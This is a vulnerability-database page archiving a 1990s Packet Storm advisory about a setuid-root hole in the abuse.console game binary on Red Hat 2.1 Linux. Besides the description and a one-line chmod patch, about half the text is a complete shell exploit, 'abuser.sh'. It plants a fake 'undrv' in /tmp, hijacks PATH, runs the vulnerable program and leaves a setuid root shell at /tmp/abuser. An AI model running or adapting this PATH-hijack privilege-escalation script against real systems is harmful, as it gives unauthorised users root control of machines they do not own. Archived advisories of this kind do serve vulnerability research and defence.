Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPacket StormPACKETSTORM:15084
HistoryAug 17, 1999 - 12:00 a.m.

abuseconsole.sh

1999-08-1700:00:00
Packet Storm
packetstormsecurity.com
35
JSON
` There is a security hole in RedHat 2.1, which installs the game abuse,  
/usr/lib/games/abuse/abuse.console suid root. The abuse.console program  
loads its files without absolute pathnames, assuming the user is running  
abuse from the /usr/lib/games/abuse directory. One of these files in the  
undrv program, which abuse executes as root. If the user is not in the  
abuse directory when running this, an arbitrary program can be substituted  
for undrv, allowing the user to execute arbitrary commands as root.   
If abuse.console needs to be run by users other than root at the console,  
provisions need to be made in the code to not execute or load any files  
as root.  
  
Program: /usr/lib/games/abuse/abuse.console suid root  
Affected Operating Systems: Red Hat 2.1 linux distribution  
Requirements: account on system  
Patch: chmod -s /usr/lib/games/abuse/abuse.console  
Security Compromise: root  
Author: Dave M. ([email protected])  
Synopsis: abuse.console runs undrv without an absolute  
pathname while executing as root, allowing  
a user to substitute the real undrv with   
an arbitrary program.  
  
Exploit:  
#!/bin/sh  
#  
# abuser.sh  
# exploits a security hole in abuse to create  
# a suid root shell /tmp/abuser on a linux  
# Red Hat 2.1 system with the games package   
# installed.  
#  
# For release 2/2/96 - 1 drink credit please.  
#  
# by Dave M. ([email protected])  
#  
echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system  
echo ================ Checking system vulnerability  
if test -u /usr/lib/games/abuse/abuse.console  
then  
echo ++++++++++++++++ System appears vulnerable.  
cd /tmp  
cat << _EOF_ > /tmp/undrv  
#!/bin/sh  
/bin/cp /bin/sh /tmp/abuser  
/bin/chmod 4777 /tmp/abuser  
_EOF_  
cat << _EOF_ >> /tmp/the_wall  
so ya thought ya might like to go to the show  
to feel the warm thrill of confusion that space cadet glow  
tell me is something eluding you sunshine?  
is this not what you expected to see?  
if you wanna find out what's behind these cold eyes  
you'll just have to claw your way through this disguise  
_EOF_  
chmod +x /tmp/undrv  
PATH=/tmp  
echo ================ Executing Abuse  
/usr/lib/games/abuse/abuse.console  
/bin/rm /tmp/undrv  
/bin/rm /tmp/the_wall  
if test -u /tmp/abuser  
then  
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser  
else  
echo ---------------- Exploit failed  
fi  
else  
echo ---------------- This machine does not appear to be vulnerable.  
fi  
  
`
JSON